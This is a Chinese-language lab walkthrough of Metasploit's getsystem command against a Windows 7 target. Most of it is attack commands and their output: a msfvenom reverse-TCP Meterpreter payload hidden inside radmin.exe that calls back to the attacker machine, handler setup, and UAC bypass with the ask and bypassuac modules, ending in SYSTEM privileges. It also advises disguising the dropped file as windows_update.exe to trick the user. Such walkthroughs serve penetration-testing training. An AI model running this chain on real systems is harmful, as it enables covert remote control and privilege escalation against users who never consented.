meterpreter shell是msf上集成的一组功能强大的shell集合,当我们获取一个反弹的meterpreter shell时,可以轻松的通过各种命令对靶机进行控制。熟悉的meterpreter的同学都清楚,其中有一个getsystem命令,帮助文档说明是提权用的,没有更详细的说明,很多人会误解为这是meterpreter的一键提权工具,但每次输入这个命令,都会爆出各种“incorrect“和”denied“,本文将通过理论和实验说明此命令的适用环境及提权过程。
靶机:win7 ip:10.10.10.166
攻击机:kali2020 ip:10.10.10.136
1、攻击机上使用msfvonem生成meterpreter的payload,并下载到靶机上
root@kali2020:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.136 LPORT=4444 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o rradmin.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 1319424 bytes
Saved as: rradmin.exe
2、攻击机开启监听,靶机运行payload,得到反弹shell,使用getsystem命令,提权失败。
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.10.136
lhost => 10.10.10.136
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.10.136:4444
[*] Sending stage (180291 bytes) to 10.10.10.166
[*] Meterpreter session 1 opened (10.10.10.136:4444 -> 10.10.10.166:50129) at 2020-07-16 00:40:06 -0400
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
在meterpreter shell界面,我们可以通过shell命令,进入cmd命令提示符,使用net user查看当前用户,发现当前用户实际是在管理组administrators组中,那为什么还提权不了呢?
原来,windows操作系统在vista以后增加了一个UAC的功能,英文全称User Access Control,该功能对管理员组的用户起到一定限制,进而保护计算机安全,当我们需要运行一些重要的程序,只有管理员权限才能运行的程序时,UAC功能都会弹出一个对话框,对用户进行询问,当用户点击了同意按钮,程序才会以管理员或system权限运行。因此,我们要想提权成功,首先要绕过windows的UAC限制,接下来我们来看常用的绕过UAC的套路。
1、exploit/windows/local/ask模块绕过UAC
在exploit/windows/local/ask模块,配置选项,设置之前得到的session。我们为了迷惑被攻击者,可以将FILENAME选项设置为windows_update.exe等欺骗性质文件名。
msf5 exploit(windows/local/ask) > show options
Module options (exploit/windows/local/ask):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME windows_update.exe no File name on disk
PATH no Location on disk, %TEMP% used if not set
SESSION 1 yes The session to run this module on.
TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE)
靶机上点击是,攻击机上会返回一个新的session,我们查看uid发现还是lovely用户,但此时再使用getsystem命令,即可成功的提权,得到SYSTEM权限。
msf5 exploit(windows/local/ask) > run
[*] Started reverse TCP handler on 10.10.10.136:4444
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading windows_update.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (180291 bytes) to 10.10.10.166
[*] Meterpreter session 3 opened (10.10.10.136:4444 -> 10.10.10.166:50147) at 2020-07-16 01:54:46 -0400
meterpreter > getuid
Server username: lovely-PC\lovely
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
2、exploit/windows/local/bypassuac模块绕过UAC
此模块不同于ask模块,不需要用户电机提示,执行后自动可以绕过UAC限制,过程如下。
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > show options
Module options (exploit/windows/local/bypassuac):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
TECHNIQUE EXE yes Technique to use if UAC is turned off (Accepted: PSH, EXE)
Exploit target:
Id Name
-- ----
0 Windows x86
msf exploit(bypassuac) > set session 1
session => 1
msf exploit(bypassuac) > show options
Module options (exploit/windows/local/bypassuac):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
TECHNIQUE EXE yes Technique to use if UAC is turned off (Accepted: PSH, EXE)
Exploit target:
Id Name
-- ----
0 Windows x86
msf exploit(bypassuac) > run
[*] Started reverse TCP handler on 10.10.10.136:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (957487 bytes) to 10.10.10.166
[*] Meterpreter session 2 opened (10.10.10.136:4444 -> 10.10.10.166:49162) at 2020-07-22 22:57:46 -0400
meterpreter > getuid
Server username: root-PC\root
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter的getsystem命令,实际是针对windows的管理员组的用户的一种提权方式,当用户不在管理员组时,我们通常会通过系统的溢出漏洞进行提权。而当所得用户权限在管理员组时,我们需要先绕过UAC,然后使用getsystem命令进行提权即可。